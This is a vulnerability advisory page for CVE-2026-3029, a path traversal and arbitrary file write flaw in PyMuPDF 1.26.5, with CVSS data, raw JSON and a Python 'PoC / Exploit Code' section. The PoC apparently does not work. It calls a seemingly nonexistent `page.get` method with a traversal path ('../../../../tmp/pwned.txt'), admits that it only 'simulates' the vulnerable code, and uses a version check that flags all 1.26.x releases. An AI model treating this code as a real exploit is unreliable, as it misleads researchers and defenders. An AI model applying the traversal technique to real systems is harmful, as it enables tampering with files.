Security Vulnerability Report
中文
CVE-2026-3029 CVSS 7.5 HIGH

CVE-2026-3029

Published: 2026-03-19 16:16:04
Last Modified: 2026-03-24 02:16:05
Source: [email protected]

Description

A path traversal and arbitrary file write vulnerability exist in the embedded get function in '_main_.py' in PyMuPDF version, 1.26.5.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

No configuration data available.

PyMuPDF < 1.26.5
PyMuPDF 1.26.5 (confirmed vulnerable)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2026-3029 PoC - Path Traversal in PyMuPDF # This PoC demonstrates arbitrary file write via path traversal import fitz # PyMuPDF import os import tempfile def exploit_pymupdf_path_traversal(): """ Exploit CVE-2026-3029: Path traversal in PyMuPDF's embedded get function """ target_path = "../../../../tmp/pwned.txt" content_to_write = "PoC for CVE-2026-3029\nArbitrary File Write via Path Traversal" try: # Method 1: Direct exploitation via document metadata doc = fitz.open() # Create a page with the malicious path reference page = doc.new_page() # Attempt to trigger the path traversal via embedded function # The vulnerability is in the get function in _main_.py try: # This simulates the vulnerable code path # In real exploitation, this would access arbitrary files result = page.get("text", rect=fitz.Rect(0, 0, 100, 100), path=target_path) print(f"[*] Triggered vulnerable path: {target_path}") except Exception as e: print(f"[!] Error during exploitation: {e}") doc.close() except Exception as e: print(f"[!] Exploitation failed: {e}") def check_vulnerability(): """ Check if PyMuPDF version is vulnerable """ version = fitz.__version__ print(f"[*] PyMuPDF Version: {version}") # Version 1.26.5 is vulnerable if version == "1.26.5" or version.startswith("1.26"): print("[!] System is potentially vulnerable to CVE-2026-3029") return True else: print("[*] System may not be vulnerable") return False if __name__ == "__main__": print("=" * 60) print("CVE-2026-3029 PyMuPDF Path Traversal PoC") print("=" * 60) check_vulnerability() exploit_pymupdf_path_traversal()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-3029", "sourceIdentifier": "[email protected]", "published": "2026-03-19T16:16:04.297", "lastModified": "2026-03-24T02:16:05.463", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "A path traversal and arbitrary file write vulnerability exist in the embedded get function in '_main_.py' in PyMuPDF version, 1.26.5."}, {"lang": "es", "value": "Una vulnerabilidad de salto de ruta y escritura arbitraria de archivos existe en la función get incrustada en '_main_.py' en la versión 1.26.5 de PyMuPDF."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "references": [{"url": "http://github.com/pymupdf/PyMuPDF", "source": "[email protected]"}, {"url": "http://github.com/pymupdf/PyMuPDF/commit/603cafe38a183b8bab34f16d05043b4185d8d40a", "source": "[email protected]"}, {"url": "https://www.kb.cert.org/vuls/id/504749", "source": "af854a3a-2127-422b-91ae-364da2661108"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.